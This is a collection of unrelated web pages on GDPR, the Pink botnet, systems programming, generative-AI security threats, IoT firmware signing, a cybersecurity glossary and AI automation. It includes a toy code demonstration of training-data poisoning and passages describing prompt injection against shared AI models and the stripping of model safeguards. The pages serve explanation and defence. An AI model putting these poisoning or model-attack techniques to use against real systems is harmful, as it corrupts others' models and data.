To comply with the GDPR principles, organisations will need to ensure that all personal data is: - Processed lawfully, fairly and in a transparent manner - Collected for specified, explicit and legitimate purposes - Adequate, relevant and limited to what is necessary in relation to the purposes - Accurate and kept up-to-date - Kept for no longer than necessary - Processed in a manner that ensures appropriate security. We have devised a step-by-step checklist that’s relevant to both Data Processors and Data Controllers. Our consultants use it to ensure that each one of our data management projects complies with our responsibilities as a Data Processor. The checklist can be downloaded for free using the form below, but please be aware that the information is provided for your help and guidance and does not constitute legal advice. The information has been taken from various publications of the Information Commissioner’s Office; while every effort has been taken to ensure that the information is correct it should be noted that this document is intended as a guide only. For further information please go to www.ico.org.uk. Download the checklist here
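The “kept for no longer than necessary” principle above is one that data management projects can check mechanically. The sketch below is an illustrative assumption about how such a retention check might look in code: the purposes and retention periods are invented examples, and real values depend on your lawful basis and local regulatory guidance, not on this sketch.

```python
from datetime import date, timedelta

# Illustrative retention periods per record purpose; these durations are
# made up for the example and are not legal advice.
RETENTION = {
    "marketing_consent": timedelta(days=2 * 365),
    "invoice": timedelta(days=6 * 365),
}


def is_overdue_for_erasure(purpose: str, collected_on: date,
                           today: date) -> bool:
    """Flag a record held longer than its stated retention period."""
    limit = RETENTION[purpose]
    return today - collected_on > limit


print(is_overdue_for_erasure("marketing_consent",
                             date(2020, 1, 1), date(2024, 1, 1)))  # True
```

Running a check like this periodically over a record inventory gives a concrete, auditable answer to the retention question on a compliance checklist.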
<urn:uuid:8cd66d85-312d-40e8-abf6-8102647d2037>
CC-MAIN-2024-38
https://etlsolutions.com/gdpr-checklist-for-data-management-projects/
2024-09-15T12:07:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00696.warc.gz
en
0.9284
638
2.59375
3
Cybersecurity researchers have uncovered a cyber attack campaign that had existed in the wild for the past six years. Reports indicate that the plan was to infect millions of devices in China with the Pink Botnet malware and to prepare them so that they could be used to launch distributed denial of service (DDoS) attacks or to send spam content.

Qihoo 360, a Chinese internet security company, was the firm behind the discovery of the attack, and its Netlab security team has confirmed that the hackers behind the campaign have infected over 1.6 million devices so far. Pink malware infects MIPS-based routers, takes control of the device, and enrolls it in a botnet that threat actors can later use to send spam or launch DDoS attacks, disrupting corporate networks in the West.

NSFocus, a Beijing-based security company, confirmed the existence of zombie nodes loaded with Pink Botnet malware in its latest independent report and stated that the cybercriminals behind the incident could have taken advantage of zero-day vulnerabilities in network gateway devices to infect the devices and form a super-large-scale botnet.

What is a botnet?

A botnet is a network of malware-infected computing devices, controlled by one or more parties through a centralized server operated by a hacker. Botnets are usually used to send spam, launch denial of service attacks, siphon data, and allow an attacker to conduct ad fraud.
<urn:uuid:e358edc7-95b2-4adb-83e0-38bf41a6386a>
CC-MAIN-2024-38
https://www.cybersecurity-insiders.com/ddos-attacks-through-1-6-million-infected-pink-botnet-malware-devices/
2024-09-08T10:46:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00496.warc.gz
en
0.958179
296
2.796875
3
If you’re visiting this page, then it’s safe to assume you have some appreciation for how complex the technology sector is. IT is a complicated beast, in part because it is constantly evolving: each new advancement adds a layer of complexity on top of an already impossible number of pre-existing layers. We employ BMC Blogs as a means of peeling back some of these layers to offer deep insights and brief overviews alike, ideally exposing the IT world in a way that allows newcomers and veterans to understand it.

Today, we thought we’d talk about a more basic concept in a way that clears up at least some of the confusion surrounding software development. The topic for today, as I’m sure you guessed by reading the title of this post, is systems programming. But before we talk about what systems programming is, we should first address what a system even is within this context.

What is a System?

The dictionary definition of a system is “a set of things working together as parts of a mechanism or an interconnecting network.” This is a pretty apt way of thinking about systems as they pertain specifically to the IT world. A computer system is a collection of components (both hardware and software) that function as parts of a whole.

A system is composed of five primary elements: architecture, modules, components, interfaces, and data.

- Architecture is the conceptual model that defines the system’s structure and behavior. It is often represented graphically through flowcharts that illustrate how the processes work and how the components relate to one another.
- Modules are pieces (hardware or software) of a system that handle specific tasks within it. Each module has a defined role that details exactly what its purpose is.
- Components are groups of modules that perform related functions. Components are like micro-systems within the system at large.
Using components and modules in this way is called modular design, and it is what allows systems to reuse certain pieces or have them removed and replaced without crippling the system. Each component can function on its own and can be interchanged or placed into new systems.

- Interfaces encompass two separate entities: user interfaces and system interfaces. User interface (UI) design defines the way information is presented to users and how they interact with the system. System interface design deals with how the components interact with one another and with other systems.
- Data is the information used and outputted by the system. System designers dictate what data is pertinent for each component within the system and decide how it will be handled.

Each component complements the system in its own way to keep everything functioning properly. If one piece of the puzzle becomes askew, the entire system can be impacted. Because technology is constantly evolving, components are modified, added, or removed on a constant basis. To make sure these modifications have the desired effect, systems design is used to orchestrate the whole affair.

What is Systems Design?

Systems design involves defining each element of a system and how each component fits into the system architecture. System designers focus on top-level concepts for how each component should be incorporated into the final product. They accomplish this primarily through the use of Unified Modeling Language (UML) diagrams and flowcharts that give a graphical overview of how the components are linked within the system.

Systems design has three main areas: architectural design, logical design, and physical design. Architectural design deals with the structure of the system and how each component behaves within it. Logical design deals with abstract representations of data flow (inputs and outputs within the system). Physical design deals with the actual inputs and outputs.
The physical design establishes specific requirements for the components of the system, such as input requirements, output requirements, storage requirements, processing requirements, and system backup and recovery protocols. Another way of expressing this is to say that physical design deals with user interface design, data design, and process design.

Systems designers operate within key design principles when they are creating the system architecture. Some of the key tenets of good system design are:
- Be Explicit – All assumptions should be expressed.
- Design for Iteration – Good design takes time, and nothing is ever perfect the first time.
- Keep Digging – Complex systems fail for complex reasons.
- Be Open – Comments and feedback will improve the system.

The systems programmers are the ones responsible for executing on the vision of the system designers.

What is Systems Programming?

Systems programming involves the development of the individual pieces of software that allow the entire system to function as a single unit. It spans many layers, such as the operating system (OS), firmware, and the development environment. In more recent years, the lines between systems programming and software programming have blurred.

One of the core areas that differentiates a systems programmer from a software programmer is that systems programmers deal with the management of system resources, while software programmers operate within the constraints placed upon them by the systems programmers. This distinction matters because systems programming deals with “low-level” programming: it works closely with computer resources and machine languages, whereas software programming is primarily concerned with user interactions.
Both types of programming are ultimately attempting to provide users with the best possible experience, but systems programmers focus on delivering a better experience by reducing load times and improving the efficiency of operations. It’s imperative that everyone working within the system is aligned: the primary goal of any service or product is to deliver value to your customers. Whether you are involved with top-level user interactions or low-level system infrastructure, the end goal remains the same. This is why a company culture that supports teamwork and goal-alignment is so important for technology companies.

Modern customers have increasingly high expectations. As such, organizations must constantly seek ways to improve their output to provide customers with an ever-improving product. Achieving this is done through intelligent systems design and an agile approach to development. Bringing everyone together to work towards a singular goal is the main pursuit of the DevOps approach to software development.
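The modular design idea described earlier (interchangeable modules behind a fixed interface) can be sketched in a few lines of code. The class and method names below are invented for illustration, not drawn from any particular system:

```python
from abc import ABC, abstractmethod

class StorageModule(ABC):
    """System interface: any storage module must expose save/load."""
    @abstractmethod
    def save(self, key, value): ...
    @abstractmethod
    def load(self, key): ...

class InMemoryStorage(StorageModule):
    """One interchangeable module implementing the interface."""
    def __init__(self):
        self._data = {}
    def save(self, key, value):
        self._data[key] = value
    def load(self, key):
        return self._data[key]

class System:
    """A component that depends only on the interface, not the module."""
    def __init__(self, storage: StorageModule):
        self.storage = storage
    def record(self, key, value):
        self.storage.save(key, value)

# Swapping InMemoryStorage for, say, a database-backed module would not
# require any change to System -- the essence of modular design.
app = System(InMemoryStorage())
app.record("status", "ok")
print(app.storage.load("status"))  # ok
```

Because `System` talks only to the `StorageModule` interface, each module can be removed and replaced without crippling the rest of the system, exactly as the article describes.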
<urn:uuid:d943b15d-409c-488c-a0f3-31747bb60819>
CC-MAIN-2024-38
https://blogs.bmc.com/systems-programming/
2024-09-09T15:33:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00396.warc.gz
en
0.93721
1,255
3.546875
4
Artificial Intelligence is already affecting many aspects of our lives, and has been for decades. For better or worse, that’s going to continue. But as AI becomes more powerful and more deeply woven into the structure of our daily reality, it is critical for organizations to realistically assess its full potential as both tool and threat.

- AI enables both good and bad actors to work faster at scale.
- The prevalence of machine learning in business makes it an appealing tool and target.
- The hype surrounding AI has the potential to obscure the risks.
- The scope of emerging threats is enormous and varied.
- New AI-driven security approaches will be required to combat AI-generated threats.

Part of the problem of predicting the real implications of generative AI technology is the massive, buzzy cloud of hype that surrounds it. Even the term itself has become something of a cliché. Want to fill an auditorium at a technology event? Put AI in the title of your presentation. Want to draw attention to a machine learning feature in your software? Market it as “AI.” This has the unfortunate effect of obscuring the reality of the technology, sensationalizing benefits and dangers while simultaneously anesthetizing many to the topic as a whole. This is compounded by the fact that many people, especially the less technical, don’t really understand what, exactly, AI is.

- Artificial intelligence: In simple terms, artificial intelligence is exactly what it sounds like: the use of computer systems to simulate human intelligence processes. Examples: language processing, speech recognition, expert systems, and machine vision.
- Machine learning: Computer systems governed by algorithms that enable them to learn and adapt automatically after they have been trained on a data set. Examples: content recommendation algorithms, predictive analysis, image recognition.
- Deep learning: A technique of machine learning that uses layers of algorithms and computing units to simulate a neural network like the human brain.
Examples: large language models, translation, facial recognition.

Phishing with dynamite

Generative AI has the ability to create highly realistic copies of original content. Not only does this present potential intellectual property risks for organizations using AI for content generation, but it also allows bad actors to steal and realistically copy all sorts of data, either to pass off as an original creation or to facilitate other attacks.

Generative AI can create ultra-realistic imagery and video in seconds, and even alter live video as it is generated. This can erode confidence in a variety of vital systems, from facial recognition software to video evidence in the legal system to political misinformation, and undermine trust in virtually all forms of visual identity.

Attackers can also use generative AI tools to realistically simulate faces, voices, and written tone, as well as emulate corporate or brand identity, which can then be leveraged for highly effective and difficult-to-detect phishing attacks.

Because many organizations are using off-the-shelf generative AI models, they are potentially exposing information used to train or prompt their instance to injection attacks refined by attackers to target popular models. Without stringent safeguards in place and frequent updates, an exploit for the base model could expose any organization using that model.

While AI can generally produce convincing speech or text at speed, it isn’t always accurate. This is particularly problematic for organizations relying on AI to generate informational or support content for users, as well as for organizations using machine learning for threat detection, where an anomalous result could be especially costly.

Because AI is able to write functional code with superhuman speed, it could potentially be used to scale attacks with unprecedented speed and complexity.
In addition, AI could be used to detect vulnerabilities in a compromised code base, and it could expand the pool of attackers by lowering the barrier of entry. While popular LLMs have some safeguards against users creating malicious code, sophisticated attackers can find exploits and loopholes. Stolen or copied models can also be stripped of such safeguards, allowing bad actors to rapidly generate nearly undetectable, highly customizable exploits.

Attacks don’t necessarily need to exploit the AI itself. Instead, they could target the data used to train a machine learning model in order to falsify its output. This could then be further leveraged to create exploits within the model itself, such as falsifying a DNA sequence in a criminal database, or simply to produce results that could damage the targeted organization.

AI that is trained with or handles sensitive data could potentially expose that data, whether through a bug, as has happened with several of the major commercial models, or through a targeted attack.

We asked ChatGPT to lay out the top threats posed by generative AI. Here was its response: "Generative AI, while offering incredible potential for innovation and creativity, also presents unique challenges and threats in the realm of cybersecurity. Here are some key points to consider:"

The features that make AI a useful tool for bad actors can, and must, be used to harden cybersecurity measures. Not only will this allow organizations to develop more effective and agile cybersecurity technologies, but it will help better address human vulnerabilities as well.
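As a concrete (and deliberately tiny) illustration of the training-data poisoning attack described above, here is a toy nearest-centroid classifier whose verdict flips once mislabeled points are injected into its training set. All numbers and labels are invented for the sketch; real poisoning attacks target far larger models, but the mechanism is the same:

```python
def centroid(xs):
    return sum(xs) / len(xs)

def classify(x, benign, malicious):
    """Nearest-centroid classifier over 1-D feature values."""
    b, m = centroid(benign), centroid(malicious)
    return "benign" if abs(x - b) < abs(x - m) else "malicious"

benign = [1.0, 2.0, 3.0]
malicious = [8.0, 9.0, 10.0]
print(classify(8.0, benign, malicious))           # malicious

# Poisoning: the attacker slips malicious-looking samples into the
# training set with the *benign* label, dragging the benign centroid
# toward the malicious region of feature space.
poisoned_benign = benign + [9.0] * 9
print(classify(8.0, poisoned_benign, malicious))  # benign
```

The model itself was never touched; corrupting the data it learns from was enough to change its output, which is why training pipelines need the same integrity controls as the deployed model.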
<urn:uuid:a64ac431-98e8-4e11-8780-d39a74c84071>
CC-MAIN-2024-38
https://www.digicert.com/insights/artificial-intelligence
2024-09-09T16:07:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00396.warc.gz
en
0.937272
1,021
3.0625
3
2012 was a big year for technology in education, and as promised, I’ll be diving into 5 of the top tech trends in education that are sure to take 2013 by storm!

One of the biggest trends I hear teachers and administrators talking about is the Flipped Classroom. While this isn’t a new concept, it certainly became a much more prominent trend over the last couple of years. A high school biology teacher in Los Gatos, California is using the power of video to implement a Flipped Classroom and transform his students’ learning environment. As Renee Patton points out in her blog post, it’s not all about the technology; when implemented with sound pedagogy, the technology can have a profound impact on student engagement and learning.

At ISTE 2012 last year, we caught up with flipped learning pioneers Jonathan Bergmann and Aaron Sams to discuss how the Flipped Classroom allows for the greater personalized interaction that is vital to a student’s success. Bergmann and Sams, authors of Flip Your Classroom: Reach Every Student in Every Class Every Day, point out that one of the greatest benefits of flipping is the increase in overall interaction – both teacher to student and student to student.

This month, we will be attending the Federal Education Technology Conference (FETC), January 28 – 31 in Orlando, Florida, where our very own experts, Greg Mathison and Lance Ford, will present “Flipped and Blended Learning: Enabling Students to Learn from Home or Any Location” on Tuesday from 1 – 3 p.m. They will discuss how educators can use low-cost technologies to provide live and recorded lessons to students in any location, on any device, at any time, helping level the playing field and boosting student learning.

Got your own stories about flipping the classroom, or planning to attend FETC 2013? We’d love to hear your side of ‘the flip’.
<urn:uuid:fbca9a35-8e51-458d-82c1-76913bbb6cc1>
CC-MAIN-2024-38
https://blogs.cisco.com/education/do-you-do-the-flip-flipped-classroom-that-is
2024-09-12T03:11:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00196.warc.gz
en
0.94157
397
2.59375
3
Visual Navigator graphically represents the elements of a visual test and allows you to interact with each element through a point-and-click interface. When viewed in the Visual Navigator, a visual test is represented by information displayed in four panes that collectively provide a comprehensive view of each step in a visual test. The four panes are:

- Test Steps pane – Lists each step of a visual test in clear, non-technical language.
- Screen Preview – Displays a snapshot of the application under test as it appears when a step executes during playback of a visual test.
- Properties pane – Displays the properties of a step in a visual test.
- Storyboard – Displays the flow of a visual test through thumbnail images, which represent the logical groups of steps in a visual test.

The Screen Preview, Storyboard, and Properties panes are synchronized with the Test Steps pane and display information specific to the step selected in the Test Steps pane. In this way, you can easily view all aspects of a step by selecting it in the Test Steps pane, and then viewing information about the step in the other panes.

In addition to viewing a visual test, the Visual Navigator also allows you to enhance or update an existing visual test by using the Screen Preview and Properties panes. For example, in the Properties pane, after recording a visual test, you can change the literal value of a recorded property by replacing it with a variable. Additionally, to quickly update a visual test when changes occur in the application under test, you can update previously captured screens using the Update Screen feature of the Screen Preview.

The Visual Navigator also displays the playback result of a visual test using the same panes as those used for a visual test. For a result, the panes have additional functionality and appear in the Result window, which contains toolbar options and several tabs that display different views of result content.
Examples of additional functionality specific to a result include the ability to see the pass or fail status of each step in the Test Steps pane. Additionally, in the Screen Preview, you can see a comparison of the differences between the screens captured during recording and screens captured during playback, and then update the existing visual test without accessing the test application.
<urn:uuid:de1f3fa3-def9-4b17-bd26-b0e083ceff8f>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/silk-test/195/en/silktestworkbench-195-help-en/SILKTEST-FB884B57-VISUALNAVIGATOR-CON.html
2024-09-12T02:33:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00196.warc.gz
en
0.883281
447
2.546875
3
Supply chains need to be more robust. Over the last 20 years they have been run to maximize efficiency throughout the global manufacturing industry; however, they have also become a source of vulnerability. The nature of the vulnerability depends on your perspective. Often the issue is security of delivery of a scarce resource: for example, semiconductor shortages are causing automobile manufacturers to idle production lines, and vaccine delivery to many parts of the world is problematic.

However, there is growing concern about supply-chain security from the cyber risk perspective. The recent SolarWinds breach is an example of a supply-chain malware delivery system, where the exploit package is injected into a generic software update and subsequently gets a free piggyback ride directly into the enterprise. Tighter control over authorization credentials, and over the process of who can assemble, submit, and digitally sign software updates, is required to help mitigate this attack vector.

The more general case of cyber risk is becoming apparent with IoT. Semiconductors are designed, built, and integrated into subsystems that perhaps have 5G connectivity built in, then packaged, loaded with software, and shipped out. These might be standalone components or elements that go up the manufacturing chain for further integration. Ultimately, they get powered up, configured, and live out some operational life.

The hard problems are many. How do you trust this device? Is the design secure? Was it manufactured according to the design? Did something change along the way, maybe after a compliance and certification test? How can you verify all this?

Digital signatures and verification on all IoT elements will provide the largest contribution to mitigating these issues. This is a fundamental building block to gaining trust. When IoT devices are powered up and undergo initial configuration and provisioning, the digital signature on the software load can be verified.
There is a ‘trust anchor’ involved in this step, as electronic trust starts and stops at known points. The start point is the digital certificate baked into the device at manufacture. This certificate needs to be trusted by all downstream verifiers.

In critical infrastructure and other safety-related applications, government regulation and compliance will form a major part of the trust mechanism by requiring verification to be completed before a particular device can be deployed. This can work during provisioning, where the electronic credentials (serial number included) of the device are verified against a list of known and approved devices for a particular jurisdiction or application. Only when the validation passes will provisioning complete and operations begin. The device will be known to be trustworthy, and verification proves that it was not modified in transit.

To continue to trust the IoT device, the supply chain of software updates must be managed. Being able to verify who can deliver and update that software, and that it is being delivered as intended, is fundamental to maintaining this trust. Public key cryptography provides the tools for this, with one caution: the implementation must be able to withstand the quantum attacks that are expected to emerge in the near future.

Cryptography Is the Backbone of Digital Trust

Trust is not easy, but it is essential. At the end of the day, cryptography is the backbone of digital trust and should be viewed as critical infrastructure. Managing all cryptographic assets, including certificates, libraries, and encryption, is becoming increasingly critical to maintaining security. And with the ever-increasing proliferation of IoT and connected devices, managing cryptography continuously through a crypto-agile approach will be the most efficient, practical path going forward.
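A minimal sketch of the verify-before-install step described above, using only the Python standard library. Real IoT deployments use asymmetric signatures (for example RSA, ECDSA, or Ed25519) chained to an X.509 trust-anchor certificate, so the signing key never leaves the vendor; HMAC stands in here purely to keep the sketch self-contained, and all names and values are illustrative:

```python
import hashlib
import hmac

# Stand-in for the trust anchor baked into the device at manufacture.
# In a real device this would be a public key / certificate, not a
# shared secret.
DEVICE_TRUST_ANCHOR = b"factory-provisioned-secret"

def sign_update(firmware: bytes) -> bytes:
    """Vendor side: produce an authentication tag over the firmware image."""
    return hmac.new(DEVICE_TRUST_ANCHOR, firmware, hashlib.sha256).digest()

def verify_update(firmware: bytes, tag: bytes) -> bool:
    """Device side: refuse to install unless the tag checks out."""
    expected = hmac.new(DEVICE_TRUST_ANCHOR, firmware, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)  # constant-time comparison

image = b"firmware v2.1"
tag = sign_update(image)
print(verify_update(image, tag))                 # True
print(verify_update(image + b"tampered", tag))   # False
```

The shape of the flow is the important part: any modification of the image in transit changes the digest, the check fails, and the device declines to install, which is exactly the supply-chain guarantee the article argues for.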
<urn:uuid:10fd2a83-66db-485d-8b3e-37bf796e6511>
CC-MAIN-2024-38
https://www.infosecglobal.com/posts/supply-chain-cybersecurity
2024-09-08T12:24:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00596.warc.gz
en
0.950687
697
2.8125
3
What is a function of a Wireless LAN Controller?

A Wireless LAN Controller (WLC) is a network component that helps to manage and control wireless access points (APs) in a wireless network. It is typically used in enterprise-level deployments, where multiple APs need to be managed centrally. The functions of a Wireless LAN Controller include:

C. Sending LWAPP packets to access points: The WLC uses the Lightweight Access Point Protocol (LWAPP) to communicate with access points in the wireless network. LWAPP packets are used to send control and management information between the WLC and APs, such as configuration information, firmware updates, and monitoring data.

A. Registering with a single access point that controls traffic between wired and wireless endpoints: The WLC acts as a central point of control for all the APs in the wireless network. It registers with each AP and manages its configuration and behavior. The WLC also controls the traffic flow between wired and wireless endpoints, ensuring that wireless clients can communicate with the wired network securely and efficiently.

B. Using SSIDs to distinguish between wireless clients: The WLC can define multiple Service Set Identifiers (SSIDs) for different groups of wireless clients. Each SSID is associated with a different set of security policies, allowing the WLC to enforce different levels of access and authentication for different types of wireless clients.

D. Monitoring activity on wireless and wired LANs: The WLC can collect monitoring data from each AP in the wireless network, allowing it to monitor the performance and behavior of the network as a whole. The WLC can also collect monitoring data from wired network devices, allowing it to monitor traffic flow between wired and wireless endpoints.
In summary, the Wireless LAN Controller is a critical component of enterprise wireless networks, as it provides centralized management, control, and monitoring of access points. Its functions include sending LWAPP packets, registering with access points, using SSIDs to distinguish between wireless clients, and monitoring activity on wireless and wired LANs.
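The SSID-to-policy mapping described in option B can be made concrete with a toy data model. The SSID names and policy fields below are invented for illustration, not taken from any real WLC configuration:

```python
# Each SSID maps to its own security policy -- this is how one controller
# can enforce different authentication rules for different client groups.
ssid_policies = {
    "corp-wifi":  {"auth": "802.1X",         "vlan": 10},
    "guest-wifi": {"auth": "captive-portal", "vlan": 20},
}

def policy_for(ssid):
    """Look up the policy for an SSID; unknown SSIDs are denied."""
    return ssid_policies.get(ssid, {"auth": "deny", "vlan": None})

print(policy_for("guest-wifi")["auth"])  # captive-portal
print(policy_for("unknown")["auth"])     # deny
```

A real WLC attaches far more to each SSID (encryption suites, QoS, ACLs), but the lookup-by-SSID structure is the core of how it distinguishes client groups.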
<urn:uuid:029187fd-a719-45f7-ac2f-988d577a475f>
CC-MAIN-2024-38
https://www.exam-answer.com/what-is-wlc-function
2024-09-10T23:15:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00396.warc.gz
en
0.934384
434
2.640625
3
ABC's of Cybersecurity: 32 cybersecurity acronyms and terms you need to know.

- APT (Advanced Persistent Threat) – A cyber attack in which an advanced (possibly state-backed) hacker or bad actor targets a specific organization for a long period of time by staying hidden in a network.
- BYOD (Bring Your Own Device) – A policy allowing employees to use personal devices to access company resources.
- Data Incident (or data breach) – An event that occurs when information is accessed and/or exfiltrated by an unauthorized person or entity, like a hacker, without the knowledge of the organization from which it came.
- Distributed Denial of Service (DDoS) – A type of attack in which a network is flooded with traffic from multiple sources to overload it and cause a service disruption.
- Encryption – The process of converting plaintext into ciphertext using a secret key.
- Hacker – Also known as a bad actor or threat actor; an individual who uses a computer system to gain unauthorized access to an account or system for data.
- Living off the Land – A cybersecurity attack that involves hackers using the target's existing and known hardware and/or software resources to engage in malicious activity.
- Malware – Malicious software that is designed to cause harm to a computer system or network.
- Phishing – The most common form of cybercrime, in which a hacker or bad actor attempts to gain access to personal and/or company data. Phishing typically occurs via email with links containing malware.
- Ransomware – A form of malware where bad actors encrypt information on a computer system so users are unable to access their own data, and demand payment in exchange for giving back the information.
- Security Assessment – A big-picture snapshot of your current cyber risk exposure, revealing vulnerabilities and uncovering opportunities to improve defenses.
- Zero-Day Attack – A cyber attack that infiltrates information systems through previously unknown vulnerabilities in software and/or firmware.
- When a company updates any server, device, or system, there is a risk of potential incidents in vulnerable areas within the update.
- Anti-virus – Software used to identify and isolate (quarantine) viruses, worms, and other malicious software on endpoints (laptops, servers, mobile devices, etc.).
- Business Continuity and Disaster Recovery (BCDR) – A solution to reduce business downtime, mitigate legal ramifications, and save SMBs from losing money as the result of disasters, whether natural or human-made.
- Cloud Computing – The delivery of computing services, including servers, storage, databases, and software, over the internet.
- Cyber Insurance – A form of insurance that protects businesses and individuals from financial loss from cyber attacks or incidents.
- Disaster Recovery Plan – A documented procedure for an organization to follow to recover from a disaster that impacts normal operations.
- Endpoint Detection and Response (EDR) – A tool that identifies and investigates threats to a business's endpoints. EDR solutions replace traditional anti-virus software by offering more security.
- eXtended Detection and Response (XDR) – An advanced security technology that combines multiple security tools and data sources to provide a more thorough and comprehensive look inside your organization's security posture.
- Firewall – A network security system that monitors and controls incoming and outgoing network traffic based on security rules.
- Incident Response (IR) – A formal, documented, and organized approach to managing the effects of a security incident or cyberattack.
- Managed Detection and Response (MDR) – A cybersecurity solution that uses EDR monitored 24/7/365 by trained human experts (a SOC) to provide a more complete cybersecurity defense.
- Multi-Factor Authentication (MFA) – A security method used to add a second layer of authentication when accessing accounts and/or devices.
In addition to a username and password, MFA also requires codes, biometrics, or other information.
- Secure Access Service Edge (SASE) – A cloud-based zero trust architecture which requires no on-premise hardware.
- Security Information and Event Management (SIEM) – A log monitoring and archiving tool that provides your business with the ability to identify threats and anomalies in real time, or to investigate historic network, system, and user activities.
- Single Sign-On (SSO) – A technology that gives users access to multiple accounts with just one set of login credentials. SSO simplifies the login process and reduces the risk of poor password hygiene, like weak or reused passwords.
- Virtual Private Network (VPN) – A remote connection method used to obfuscate all network traffic using strong encryption. A VPN is often used to access a corporate network, or to add security and privacy when using public networks such as those in airports or hotels.
- Vulnerability Management – A service that routinely scans for and patches weak points in your system that could be exploited. The process provides real-time visibility into potential flaws so they can be prioritized and addressed before they pose a serious risk.
- Chief Information Security Officer (CISO) – A senior-level executive who is responsible for managing the security of a company's information and technology.
- Managed Security Services Provider (MSSP) – An MSP (Managed Services Provider) with a focus on security. MSSPs provide services like cybersecurity, BCDR, network monitoring, and more.
- Network Operations Center (NOC) – A centralized location where a team of IT professionals monitors and manages the performance and security of remote monitoring and management software.
- Security Operations Center (SOC) – A 24/7/365 operation staffed by human experts who review incoming security alerts and take immediate action to isolate and remediate potential threats before they can cause significant damage.
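To make one of these terms concrete: the rotating codes generated by MFA authenticator apps typically follow the TOTP algorithm (RFC 6238), which can be sketched with only the Python standard library. The secret below is the published RFC test secret, not a real credential:

```python
import hashlib
import hmac
import struct
import time

def totp(secret, at=None, step=30, digits=6):
    """RFC 6238 time-based one-time password (SHA-1 variant)."""
    counter = int((time.time() if at is None else at) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    # Dynamic truncation per RFC 4226: pick 4 bytes at a digest-derived offset.
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Both the server and the authenticator app derive the same code from a
# shared secret and the current time, so entering the code proves
# possession of the second factor without transmitting the secret itself.
secret = b"12345678901234567890"   # RFC 6238 test secret
print(totp(secret, at=59))         # 287082 (matches the RFC test vector)
```

This is why the codes expire every 30 seconds: the counter is the current time divided by the step, so a stolen code is only useful within one window.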
<urn:uuid:a8e5ce74-a912-44e1-8742-62f35f658150>
CC-MAIN-2024-38
https://www.abadata.com/cybersecurity
2024-09-12T06:42:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00296.warc.gz
en
0.904776
1,123
3.09375
3
Exploring AI and Generative AI Automation

In the modern field of AI-based systems and the current innovations in generative AI, organizations are finding new ways to develop more efficient processes and implement game-changing improvements for years to come. For many, there's a fear of how gen AI could impact their employees, customers, and compliance with regulations. In this guide, we'll look at how artificial intelligence technology can be safely and effectively deployed into your automations, and how you can utilize the abilities of language models and other generative AI automation to transform your business.

What Is AI Automation?

Automation began with robots performing repetitive tasks, also called robotic process automation (RPA). As artificial intelligence (AI) evolved, automation's capabilities have expanded to include end-to-end processes, connecting systems, and orchestrating work. That connection of RPA with AI and business process management (BPM) is called intelligent automation (IA).

RPA | Performs repetitive tasks
AI  | Mimics human thinking
BPM | Automates workflows
IA  | Combines RPA, AI, and BPM

Is AI the same as automation?

No, AI isn't the same as automation, but they can work together to do a lot more than either could manage on its own. That team-up is where you get cognitive automation.

Automation deploys robots to execute a series of rule-based instructions set by humans, reducing the manual labor involved in routine tasks. If the action goes beyond what the developer programmed, the robots are unable to complete the task. By incorporating AI into RPA and other automation technologies, robots can take the broad outlines laid out by humans and determine their own pathway to achieve the goal. The machine learning (ML) capabilities within AI allow it to learn from its actions so it can improve its performance over time.
Here's how that combination works in a nutshell to create intelligent automation: - AI uses ML and complex algorithms to analyze structured and unstructured data. It’s the cognitive decision-making side of IA. - BPM automates workflows and connects people and systems. - RPA completes simple administrative tasks such as form filling and data extraction. Artificial intelligence (AI) as a technology can also include machine learning (ML), natural language processing (NLP), computer vision, and deep learning techniques. What is an example of automation and AI working together? AI automation technologies (AKA intelligent automation) allow organizations to augment their human workers with these IA digital workers to streamline business processes. This helps deal with skills and labor shortages and frees employees from boring, repetitive tasks so they can focus on higher-value strategic work. A good example of this is virtual assistants or AI-powered chatbots. Customer service centers are often bombarded with thousands of emails – too many for a few people to respond to adequately and rapidly within their eight-hour workday. However, AI chatbots answer customer queries instantly, working around the clock to reduce customer wait time. If the chatbot can’t answer a customer’s question, the conversation is brought to a human agent. This helps reduce wait times and backlogs and means the employees can focus on more complex cases. How can you automate more with AI? By putting automation and AI (or gen AI) together, you can take your business capabilities further: - Generative AI interprets and creates content with simulated human intelligence, including text and images, to augment work. Using natural language processing, gen AI can answer customer inquiries and augment decision-making. At SS&C Blue Prism, we’re expanding our intelligent automation with generative AI to enable businesses to automate more complex processes. 
